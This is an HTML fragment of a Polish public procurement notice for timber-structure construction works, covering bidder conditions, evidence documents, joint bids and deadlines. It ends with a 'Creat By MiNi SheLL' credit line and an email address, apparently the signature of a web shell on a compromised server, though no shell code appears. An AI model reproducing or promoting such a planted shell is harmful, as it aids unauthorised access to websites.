1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu na zasadach określonych w rozdziale IX SWZ;<br/>2) spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: <br/>2.1. Zdolności do występowania w obrocie gospodarczym.<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2.2. Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile to wynika z odrębnych przepisów. <br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2.3. Sytuacja ekonomiczna lub finansowa.<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2.4. Zdolność techniczna lub zawodowa. <br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że: <br/>a) dysponuje na potrzeby realizacji zamówienia co najmniej jedną osobą zdolną pełnić samodzielne funkcje w budownictwie, posiadającą minimum 2 – letnie doświadczenie w kierowaniu budową lub innymi robotami budowlanymi i posiadającą uprawnienia budowlane w specjalności konstrukcyjno – budowlanej bez ograniczeń. <br/>b) w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie – wykonał co najmniej jedną robotę budowlaną o wartości minimum 80 000,00zł brutto, polegającą na budowie wiaty drewnianej lub obiektu budowlanego <br/>o konstrukcji drewnianej. <br/>UWAGA:<br/>3. Jeżeli roboty budowlane są wykonywane nadal, wartość wykonanej/ zrealizowanej części roboty budowlanej nie może być niższa od wskazanej powyżej, wraz z dowodami potwierdzającymi, że roboty te zostały wykonane lub są wykonywane należycie.<br/>4. Ocena spełnienia warunków udziału w postępowaniu będzie dokonana w oparciu o złożone przez Wykonawcę oświadczenia i dokumenty. Ocena, będzie dokonywana, na zasadzie spełnia/nie spełnia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, w stosunku do których zachodzi którakolwiek z okoliczności wskazanych: <br/>1) w art. 108 ust. 1 pkt 1-6 Ustawy Pzp,<br/>2) w art. 109 ust. 1 pkt. 1, 4, 5 oraz 8 Ustawy Pzp, <br/>3) w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz.U.2025.514).<br/>2. Stosowanie do art. 110 ust. 1 Ustawy Pzp Wykonawca może zostać wykluczony przez Zamawiającego na każdym etapie postępowania o udzielnie zamówienia publicznego z zastrzeżeniem art. 110 ust. 2 Ustawy Pzp. <br/>3. Wykluczenie Wykonawcy następuje zgodnie z art. 111 Ustawy Pzp.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu tj.: <br/>a) oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 Ustawy Pzp w zakresie odnoszącym się do braku podstaw do wykluczenia Wykonawcy <br/>z postępowania. Wzór oświadczenia stanowi załącznik nr 5 do SWZ,<br/>b) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 Ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>2) w celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej: <br/>a) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego wraz z informacjami na temat ich posiadanego minimum 2 – letniego doświadczenia w kierowaniu budową lub innymi robotami budowlanymi i posiadającą uprawnienia budowlane w specjalności konstrukcyjno – budowlanej bez ograniczeń – wzór wykazu osób stanowi załącznik nr 7 do SWZ. <br/>b) wykaz robót budowlanych, wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie - co najmniej jednej roboty budowlanej o wartości nie mniejszej niż 80 000,00zł brutto, polegającej na budowie wiaty drewnianej lub obiektu budowlanego o konstrukcji drewnianej, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których roboty te zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających czy roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku robót budowlanych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie – wzór wykazu robót budowlanych stanowi załącznik nr 8 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga składania przedmiotowych środków dowodowych w niniejszym postępowaniu. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Wykonawca może złożyć tylko jedną ofertę. <br/>2. Treść oferty musi odpowiadać treści SWZ. <br/>3. Ofertę składa się na formularzu ofertowym – zgodnie z załącznikiem nr 2 do SWZ . <br/>Wraz z formularzem ofertowym Wykonawca jest zobowiązany złożyć: <br/>1) oświadczenie Wykonawcy o braku podstaw do wykluczenia z postępowania i o spełnianiu warunków udziału w postępowaniu oraz o poleganiu na zasobach podmiotu trzeciego - załącznik nr 3 do SWZ, <br/>2) zobowiązanie innego podmiotu do udostępnienia Wykonawcy zasobów (jeżeli dotyczy) - załącznik nr 3a do SWZ, <br/>3) oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia z art. 117 ust. 4 Ustawy Pzp (jeżeli dotyczy) - załącznik nr 4 do SWZ,<br/>4) oświadczenie podmiotu udostępniającego zasoby o niepodleganiu wykluczeniu z postępowania oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby (jeżeli dotyczy) - załącznik nr 6 do SWZ, <br/>5) pełnomocnictwo do podpisywania w imieniu Wykonawcy oferty (jeżeli dotyczy), <br/>4. Oferta musi być podpisana przez osobę upoważnioną do reprezentowania Wykonawcy, zgodnie z formą reprezentacji Wykonawcy określoną w rejestrze lub innym dokumencie, właściwym dla danej formy organizacyjnej Wykonawcy albo przez upełnomocnionego przedstawiciela Wykonawcy. <br/>5. Oferta musi być sporządzona w języku polskim. Ofertę oraz oświadczenia i dokumenty składane z ofertą, sporządza się, pod rygorem nieważności, w formie elektronicznej (wszystkie dokumenty podpisane kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu w zakresie wskazanym przez Zamawiającego, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie te wstępnie potwierdza spełnianie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia. <br/>3. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <br/>4. W przypadku podmiotów składających ofertę wspólną, warunki, o których mowa w Rozdziale VIII ust. 2.4. SWZ musi spełniać co najmniej jeden z nich lub wszyscy Wykonawcy. <br/>5. W przypadku, gdy ofertę składają Wykonawcy wspólnie w okolicznościach wskazanych w art. 117 ust. 4 Ustawy Pzp (tj. w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia), Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy. Wzór oświadczenia stanowi załącznik nr 4 do SWZ. <br/>6. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>7. Wykonawcy, składający ofertę wspólnie, ponoszą solidarną odpowiedzialność za wykonanie umowy. <br/>8. Wszelka korespondencja dokonywana będzie z Wykonawcą występującym jako pełnomocnik pozostałych. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych w projekcie umowy, stanowiącym załącznik nr 9 do SWZ <br/>2. Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie. <br/>3. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w projekcie umowy, stanowiącym załącznik nr 9 do SWZ. <br/>4. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-09-09 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">platforma e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-09-09 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, w stosunku do których zachodzi którakolwiek z okoliczności wskazanych w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz.U.2025.514).<br/>2. Zamawiający nie dopuszcza możliwości składania ofert częściowych.<br/>3. Zamawiający nie dopuszcza możliwości składania ofert częściowych.<br/>Z uwagi na charakter i specyfikę zamówienia jakim jest przedmiotowa robota budowlana, podział na części groziłby nadmiernymi utrudnieniami ekonomicznymi i organizacyjnymi związanymi m.in. z koordynacją prac budowlanych i powierzenie wykonania zamówienia kilku Wykonawcom, co <br/>w znaczący sposób utrudniłoby organizację realizacji zamówienia. Osiągnięcie prawidłowego wykonania zamówienia jest możliwe tylko wówczas, jeśli Wykonawca zachowa pełną kontrolę nad jego realizacją, w szczególności w terminie realizacji zamówienia. Skoordynowanie działań ewentualnych różnych Wykonawców realizujących poszczególne części zamówienia mogłoby poważnie zagrozić właściwemu i terminowemu wykonaniu zamówienia, ze względu na m.in. konieczność precyzyjnego harmonogramowania realizacji poszczególnych prac. Potrzebą Zamawiającego jest pozyskanie Wykonawcy, który w terminie wykona przedmiot zamówienia, w zakresie wskazanym w obszarze realizacji projektu „Skarbiec Dziedzictwa”, które to obszary są merytorycznie ze sobą powiązane <br/>i wymagają specjalistycznej wiedzy i doświadczenia od Wykonawcy w zakresie prac obejmujących obiekty zabytkowe. Mając powyższe na uwadze, przedmiot zamówienia ze względów technicznych, organizacyjnych i ekonomicznych tworzy nierozerwalną całość.

Creat By MiNi SheLL
Email: jattceo@gmail.com